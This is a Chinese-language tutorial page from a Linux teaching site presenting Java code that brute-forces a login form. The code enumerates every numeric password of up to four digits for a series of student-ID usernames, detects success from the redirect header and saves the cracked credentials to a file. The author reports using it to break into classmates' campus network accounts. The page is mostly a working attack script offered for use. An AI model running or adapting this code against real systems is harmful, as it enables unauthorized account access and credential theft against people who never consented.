歡迎來到Linux教程網
Linux教程網
Linux教程網
Linux教程網
您现在的位置: Linux教程網 >> UnixLinux >  >> Linux編程 >> Linux編程

Java網絡編程五:暴力法破解登錄系統的完全實現

注:以下破解思路及代碼源自我同學木子

1、先來看一個無任何安全措施的登錄系統的破解方法:每次模擬表單提交,若登錄成功,此時返回的報頭信息中有Location字段,登錄失敗無此字段,繼續模擬登錄。直到破解成功,本人成功破解部分同學校園網登錄密碼(純四位數字的)代碼如下:

  1. <span style="font-size:16px;">package demo.net;  
  2.   
  3. import java.io.IOException;  
  4. import java.io.PrintWriter;  
  5. import java.net.HttpURLConnection;  
  6. import java.net.URL;  
  7.   
  8. import mine.util.io.TextFile;  
  9.   
  10. //暴力法破解簡單登錄系統:該系統無任何安全措施   
  11. public class PostTest {  
  12.     String urlString = "登錄頁面的url";  
  13.   
  14.     public PostTest() {  
  15.     }  
  16.   
  17.     public PostTest(String urlString) {  
  18.         this.urlString = urlString;  
  19.     }  
  20.   
  21.     // 提交一次用戶請求   
  22.     private boolean doPost(String user, String password) {  
  23.         boolean sucess = false;  
  24.         try {  
  25.             URL realUrl = new URL(urlString);  
  26.             HttpURLConnection conn = (HttpURLConnection) realUrl  
  27.                     .openConnection();  
  28.             conn.setDoOutput(true);  
  29.             conn.setDoInput(true);  
  30.             conn.setInstanceFollowRedirects(false);  
  31.   
  32.             // 提交表單,發送的數據是直接用Firebug截取的然後把用戶名,密碼部分換成參數   
  33.             PrintWriter out = new PrintWriter(conn.getOutputStream());  
  34.             out.print("要提交的表單信息");  
  35.             out.flush();  
  36.   
  37.             // 如果登錄不成功,報頭中沒有Location字段,getHeaderField("Location") 返回null   
  38.             // 登錄成功,返回一個隨機的Location字段   
  39.             // System.out.println(conn.getHeaderFields());   
  40.             if (conn.getHeaderField("Location") != null) {  
  41.                 sucess = true;  
  42.             }  
  43.         } catch (IOException e) {  
  44.             e.printStackTrace();  
  45.         }  
  46.         return sucess;  
  47.     }  
  48.   
  49.     // 這是一個全排列算法, 對特定長度的密碼排列組合,把結果存入list   
  50.     // user:用戶名 , n:字符下標 , len:字符數組長度,也就是密碼長度   
  51.     private boolean createPassWord(String user, char[] str, int n, int len) {  
  52.         if (n == len) {  
  53.             String ps = new String(str);  
  54.             if (doPost(user, ps)) {  
  55. //              System.out.println("sucess:" + user + " : " + ps);   
  56.                 TextFile.write("file/校園網用戶名及密碼.txt"true"sucess:" + user  
  57.                         + " : " + ps + "\n");  
  58.                 return true;  
  59.             }  
  60.             return false;  
  61.         }  
  62.         for (int i = 0; i <= 9; i++) {  
  63.             str[n] = (char) (i + '0');  
  64.             if (createPassWord(user, str, n + 1, len))  
  65.                 return true;  
  66.         }  
  67.         return false;  
  68.     }  
  69.   
  70.     // 破解一個用戶的密碼   
  71.     public void test(String user) {  
  72.         for (int i = 0; i < 4; i++) {  
  73.             if (createPassWord(user, new char[i + 1], 0, i + 1))  
  74.                 break;  
  75.         }  
  76.     }  
  77.   
  78.     public static void main(String[] args) {  
  79.         PostTest pt = new PostTest();  
  80.         for (int i = 1; i <= 9; i++)  
  81.             pt.test("09050510" + i);  
  82.         for (int i = 10; i <= 31; i++)  
  83.             pt.test("0905051" + i);  
  84.     }  
  85. }  
  86. </span>  

這個示例代碼中只破解密碼為4位或4位數字之內的密碼,大概破解一個用戶需要十分鐘。如果破解5、6...更長的密碼,破解時間將很長。

Copyright © Linux教程網 All Rights Reserved